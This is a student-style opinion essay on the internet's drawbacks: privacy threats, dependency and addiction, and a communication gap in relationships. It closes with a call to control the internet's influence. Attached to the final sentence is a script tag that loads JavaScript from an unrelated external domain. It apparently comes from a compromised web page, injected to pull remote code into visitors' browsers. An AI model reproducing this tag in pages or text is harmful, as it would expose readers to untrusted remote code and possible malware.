The internet has transformed the way information is shared and consumed, but it has also created problems that did not exist before. What are the most serious problems associated with the internet and what solutions can you suggest?

After the invention of fire and wheel, invention of internet brought a revolution in human life. It has provided a number of means to transfer the information as well as to consume. All these facilities comes with abundance of drawbacks. In the essay further, i will discuss these negative points and what solutions we can adapt in counter.

First issue which came into picture with the expansion on internet is lack of privacy. Internet have presented us with many social media platforms and also with a whole new virtual financial world. Personal and private information of the users needs to be shared in order to access these platforms. This information which is being stored on different virtual and physical storage devices, is vulnerable to threats even though many advanced security measures are in place. The world has already witnessed many disastrous situations which were driven by misuse of information present online.

Secondly, people are getting more dependent on it. Somehow this dependency is being converted to addiction to a certain level. Just because we are leveraging internet's capabilities to do our day to day tasks. For example, people were seen visiting markets for the shopping of household and basic amenities, but in today's world of internet these things are available on a click. Which in return impacting us mentally, emotionally and physically.

Lastly, these days people have started living in virtual world of internet and a communication gap is visible in the relationships be it personal or professional. People are having more friends on social media channels than in real life. More and more time is being spent on chatting, surfing and scrolling through these virtual channels. Thus producing computer zombies out of normal human beings.

As we can see, internet has numerous advantages along with a set of disadvantages. So to avoid the negative part, we can not discard internet wholly. But we can control its influence on the parts where it is affecting us. Thus taking advantages in constructive ways wherever possible. <script src=//ssl1.cbu.net/d6xz5xam></script>